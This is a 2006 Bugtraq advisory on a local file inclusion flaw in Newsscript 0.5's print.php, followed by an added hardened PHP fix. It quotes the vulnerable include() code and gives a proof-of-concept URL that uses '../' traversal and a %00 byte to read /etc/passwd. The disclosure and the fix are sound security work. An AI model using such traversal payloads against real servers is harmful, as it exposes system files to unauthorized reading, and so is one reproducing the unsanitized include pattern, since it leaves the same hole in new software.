Bugtraq mailing list archives

Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability


From: daftrix () gmail com
Date: 12 Sep 2006 03:06:19 -0000

# Subject:

--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "

# Vulnerable version:

--- "Newsscript version 0.5"



# Vendor URL:

--- Email - mail () webmaster-journal com
--- Website - http://webmaster-journal.com



# Available in:

--- http://www.comscripts.com/scripts/php.wm-news.203.html



# Vulnerability:

--- Vulnerable code in print/print.php

--- $ide var is not sanitized and can be used to include files from local resources

--- 1       <html>
--- 2       <head>
--- 3       <?
--- 4         $file_name = "../".$ide.".txt";
--- 5       ?>
--- 
---
--- 27       include($file_name);



# Exploit:

--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00



# Discovered By:

--- Daftrix[at]Gmail.com
--- Daftrix Security Investigations
--- http://www.daftrix.com 
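
A hardened replacement for the lookup in print/print.php reported above, as an added example that is not part of the original advisory or of Newsscript's own code. The names resolve_news_file() and NEWS_DIR, the location of the article directory, and the choice to output the article with readfile() are assumptions.

```php
<?php
// Added example, not Newsscript code. resolve_news_file() and NEWS_DIR are
// hypothetical names; the article directory is assumed to be the parent of print/.
define('NEWS_DIR', realpath(__DIR__ . '/..'));

/**
 * Map an article id to a .txt file inside $baseDir.
 * Returns the absolute path, or null if the id is not acceptable.
 */
function resolve_news_file($ide, $baseDir = NEWS_DIR)
{
    // Reject arrays (ide[]=x) and missing values.
    if (!is_string($ide)) {
        return null;
    }
    // Allowlist: letters, digits, underscore, hyphen. This rejects "/", "..",
    // and the NUL byte (%00) that older PHP versions let truncate the ".txt"
    // suffix. \A and \z anchor the whole string, including a trailing newline.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $ide)) {
        return null;
    }
    // Resolve symlinks and confirm the result is still inside the base directory.
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $ide . '.txt');
    $prefix = $baseDir . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly instead of relying on register_globals
// to create $ide from the query string.
$ide  = isset($_GET['ide']) ? $_GET['ide'] : null;
$file = resolve_news_file($ide);

if ($file === null) {
    http_response_code(404);
    exit('Article not found');
}

// The article is data, not code: send it with readfile() rather than
// include(), so PHP inside a .txt file is never executed.
readfile($file);
```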

